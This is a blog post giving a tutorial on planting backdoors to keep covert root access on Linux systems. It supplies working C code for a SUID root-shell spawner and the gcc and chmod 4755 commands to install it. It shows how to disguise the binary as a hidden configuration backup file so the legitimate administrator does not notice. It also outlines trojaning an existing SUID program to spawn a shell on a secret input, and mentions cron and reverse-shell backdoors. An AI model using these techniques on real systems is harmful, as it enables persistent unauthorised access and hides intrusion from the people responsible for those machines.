Backdoors: Maintaining Root Access
In the last post, we talked about how we could use SUID programs to gain root access. Now after gaining root access, what happens next will vary depending on objectives. In general though, you might like to maintain root access without the legitimate root user noticing. This is essentially what a backdoor does. Of course you could just redo the exploit you did to get in, but sometimes that is not possible. Backdoors have become increasingly sophisticated over the years, but their main purpose is to allow a person to regain access to a system at another time. You can always look for popular backdoor scripts online, but it's fun to write your own.
Simple Backdoors
One of the most classic ways to backdoor is to copy /bin/sh or /bin/bash to /tmp/.myshell and then give it SUID permissions. Modern systems will not allow this. Either /tmp will be mounted with nosuid or /tmp files will be cleared very often.
Alternatively, you can copy /bin/sh into some other legitimate directory that no one really looks at, but you'll have to make sure that the directory allows suid. Usually, /home is mounted without nosuid. You can figure out the filesystems typing mount.
hypervelocity ~ $ mount proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) sys on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) dev on /dev type devtmpfs (rw,nosuid,relatime,size=6125384k,nr_inodes=1531346,mode=755) run on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755) /dev/sda5 on / type ext4 (rw,relatime,data=ordered) securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
So you can see that my root partition here at /dev/sda5 allows suid. Essentially, you can just upload an executable somewhere to like /etc/xdg/menus/.mate-settings.menu.backup and then SUID that. You don't want to be using shell scripts to get your shell because linux will ignore SUID for any shell script. Something like this is fine:
//File: shellspawn.c
int main(){
setuid(0); //UID of root
system("/bin/sh");
return 0;
}
Just compile and rename it to something like /etc/xdg/menus/.mate-settings.backup. You can pick any sort of configuration file and append .backup as the fake name and location of your backdoor. Don't forget to add the SUID permission.root ~ # pwd /etc/xdg/menus root ~ # gcc -o .mate-settings.menu.backup shellspawn.c root ~ # chmod 4755 .mate-settings.menu.backup root ~ # ls -la total 44 drwxr-xr-x 2 root root 4096 Jul 18 17:34 . drwxr-xr-x 6 root root 4096 May 2 21:28 .. -rw-r--r-- 1 root root 3242 Dec 8 2015 mate-preferences-categories.menu -rw-r--r-- 1 root root 1494 Nov 5 2015 mate-settings.menu -rwsr-xr-x 1 root root 6912 Jul 18 17:34 .mate-settings.menu.backup -rw-r--r-- 1 root root 104 Jul 18 16:36 shellspawn.c root ~ # rm shellspawn.c
hypervelocity ~ $ cd /etc/xdg/menus hypervelocity ~ $ ./.mate-settings.menu.backup sh-4.3# whoami root
Trojan Backdoors
If you want to be more covert, you can modify an existing program that's normally SUID and then have it generate a shell. You'll need the original source code and make sure it is the correct one for the Linux version/distro. In general, setuid to 0 and then call /bin/sh with system() or with one of the exec() functions. Preferably, you'll want to make it so that normal users aren't going to get the shell by accident, so have some sort of way for the program to spawn it only for a specific input.
Other Backdoors
There are many more ways you can implement a backdoor, but essentially, what you will always be trying to do is spawning a root shell when you're not root. Other classic backdoors include using cron, a tool that runs scheduled scripts as root, or creating a reverse shell to connect back to a server of your choice.
No comments:
Post a Comment